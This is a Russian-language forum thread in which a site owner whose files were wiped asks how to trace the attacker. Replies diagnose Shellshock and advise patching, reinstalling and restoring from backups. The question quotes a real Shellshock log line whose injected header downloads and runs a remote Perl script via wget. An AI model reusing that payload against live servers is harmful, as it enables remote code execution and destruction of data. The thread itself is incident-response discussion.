Как найти и наказать хакера?

Question

[Alexnn]

Один из моих сайтов пропал. Точнее - директории httpdocs и httpsdocs оказались пустыми

Логи доступа показали, то сайт стал генерировать 404 ошибку после вот такого запроса:

89.248.172.175 - - [28/Nov/2014:19:29:57 +0100] "GET /phppath/cgi_wrapper HTTP/1.1" 200 174 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /tmp;wget -q 82.165.135.9/android.txt;perl android.txt;rm -rf android*\");'"

89.248.172.175 -провайдер найден, письмо на abuse ящик послано.

Файл 82.165.135.9/android.txt - сохранен

82.165.135.9 - провайдер уведомлен

Что можно еще сделать?

Answer 1

[Вадим Мисбах-Соловьёв]

я бы ещё посоветовал:
1) не называть взломщиков (и тем более скрипткидис) хакерами без разбора
2) понять, что вина лежит на вас, а не на нём
3) понять зачем он это сделал: чтобы показать вам уязвимость, на которую вы предпочли забить

Comments

[tartarelin]

на чём основывается утверждение, что это было сделано для того, чтобы показать уязвимость?
если я проникну в ваш дом и вынесу всё, что успею, обещаете понять, что вина лежит на вас, а не на мне?

[Вадим Мисбах-Соловьёв]

да

[Вадим Мисбах-Соловьёв]

(и основывается оно на опыте из бурной юности, когда при указании на уязвимости некоторые личности предпочитали в лучшем случае игнорировать, а в худшем — угрожать, вместо того, чтобы прислушиваться.)

Хотя, да, удалять всё по корень — довольно дерзкий поступок, особенно для скрипткиддиса, достаточно было простого дефейса. Но, в конце концов, скрипткидди вполне имеет право предполагать, что администратор сайта таки ДЕЛАЕТ бекапы.

[DaNHell]

tartarelin: согласен с Вадим Мисбах-Соловьёв обычно по началу все балуются, да и в конечном итоге Админ по логике не "охотник" как можно грубо говоря сопоставить того же script kiddie. В первую очередь ценю типичные реализации в защите, что и должно вызывать интерес у Администраторов в своем ремесле, так и у пентестеров в попытках "обойти" хитрые уловки админов. Воспринимайте это как пари.
Как подрастают новички, чаще всего уже участвуют в bug bounty, в конфах, в образовательных сферах. Не много тех кого на данном этапе влечет crime..
А про громко названного "хакера", Вы серьезно думаете что абуза улетевшая "в никуда" как-то помогло делу? Да уж тем более, еще бы заставил бы он Вас поломать голову что вообще произошло...

Answer 2

[Влад Животнев]

shellshock.
bash обновлять нужно, батенька.
А на ip-шнике, скорее всего, живет домашний пользователь с вирусней, который и слов таких не слышал никогда.

Answer 3

[Армянское Радио]

1. Сделать снимок диска
2. Отформатировать все разделы
3. Установить ОС заново
4. Восстановить сайт из резервной копии
5. Устранить дыру
6. Вернуться к работе

Answer 4

[Сергей Петриков]

1) Полное форматирование сервера с переустановкой всего с нуля.
2) Уволить/оштрафовать своего криворукого админа, который забил на старую уязвимость и обновления сервера.
3) Получить урок по поводу банальной безопасности сервера и нанять компетентного специалиста для его обслуживания.
Найти - никак, скорее всего все действия выполнялись через сайт такого-же ленивого криворучки, который взломали до вашего, так как IP принадлежит нидерландскому хостингу а не интернет провайдеру. Также похоже, что уязвимость эксплуатированна примитивным ботом, а не человеком, но для того чтоб точно это утверждать нужно больше данных.

Answer 5

[Пума Тайланд]

В полицию, если человек не сильно шифровался то найти и наказать, а если есть немного мозгов то все айпи анонимные и концов не найдешь